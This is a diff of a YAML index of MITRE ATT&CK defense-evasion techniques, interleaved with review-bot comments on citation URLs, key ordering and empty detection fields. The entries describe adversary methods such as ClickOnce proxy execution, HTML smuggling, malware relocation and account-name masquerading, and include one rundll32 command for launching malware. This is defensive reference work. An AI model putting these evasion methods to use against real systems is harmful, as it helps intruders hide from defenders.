+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11512,6 +11648,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11523,13 +11660,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -11574,9 +11711,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests: []
T1564.003:
@@ -11659,18 +11793,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
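Review bot: the two Burke reference URLs in the new T1127.002 entry carry Google Analytics tracking state (`?_gl=1*1jv89bf*_gcl_au*...&_ga=...`) that is specific to whoever captured the link and adds nothing to the citation; if the generator cannot strip query strings on its own, consider doing so before regenerating, and note that the same two entries spell the author differently (`William J. Burke IV` versus `William Joseph Burke III`). Also note that both new techniques ship with `x_mitre_detection: ''` despite listing data sources, so the index offers no detection guidance for them yet.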
@@ -11703,10 +11959,9 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -11743,40 +11998,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.002:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
- type: attack-pattern
- created: '2020-05-14T14:45:15.978Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.002
- url: https://attack.mitre.org/techniques/T1578/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.416Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11785,20 +12010,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the RunInstances
event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create
to create a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Creation'
- 'Instance: Instance Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+ created: '2020-05-14T14:45:15.978Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/002
+ external_id: T1578.002
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.009:
technique:
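Review bot: the `Mandiant M-Trends 2020` reference changes its URL from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` while keeping `Retrieved April 24, 2020`, so the retrieval date no longer describes the link actually recorded. Separately, the unchanged `x_mitre_detection` context lines in this hunk have lost their inline code formatting (`RunInstances` and `gcloud compute instances create` are broken onto their own lines mid-sentence); that is an upstream artifact, but it degrades the one field in this entry that defenders act on and may be worth handling in the generator.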
@@ -11828,7 +12083,7 @@ defense-evasion:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11871,8 +12126,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1601.001:
technique:
@@ -11919,7 +12172,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:46.560Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -11985,12 +12238,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T22:30:01.227Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12045,33 +12296,84 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
- T1556.001:
+ T1036.010:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-10-17T15:20:36.705Z'
+ name: Masquerade Account Name
+ description: "Adversaries may match or approximate the names of legitimate accounts
+ to make newly created ones appear benign. This will typically occur during
+ [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+ may also be renamed at a later date. This may also coincide with [Account
+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
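Review bot: the new T1036.010 (Masquerade Account Name) entry lands with `x_mitre_detection: ''` and `atomic_tests: []`, so it carries neither detection guidance nor tests; that is expected for an upstream sync, but it deserves a follow-up issue for test coverage. Most of the rest of this hunk is T1556.001 being deleted and re-added because the key order changed (the old entry led with `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`; the new one leads with `modified`, `name`, `description`), which hides the real change. Emitting keys in a fixed order from the generator would keep future syncs reviewable.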
@@ -12092,6 +12394,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -12106,22 +12409,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
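Review bot: T1556.001 drops `x_mitre_permissions_required: - Administrator` here (T1556.005 below drops `User` and `Administrator` the same way) while moving to `x_mitre_version: '2.1'` and `x_mitre_attack_spec_version: 3.2.0`. Check that nothing in the repo's index or documentation generators reads `x_mitre_permissions_required`, and mention in the PR description that the field is gone from upstream so the removal is not mistaken for data loss.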
@@ -12179,48 +12502,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
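Review bot: the nccgroup citation URL changes from `https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/` to `https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/`, and the new slug runs `explorer` and `edge` together with no separator; please confirm the link resolves as written rather than relying on the updated retrieved date. The remainder of the hunk is the T1556.005 entry removed and re-added under a new key order, not a content change.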
@@ -12242,6 +12534,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -12252,23 +12545,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
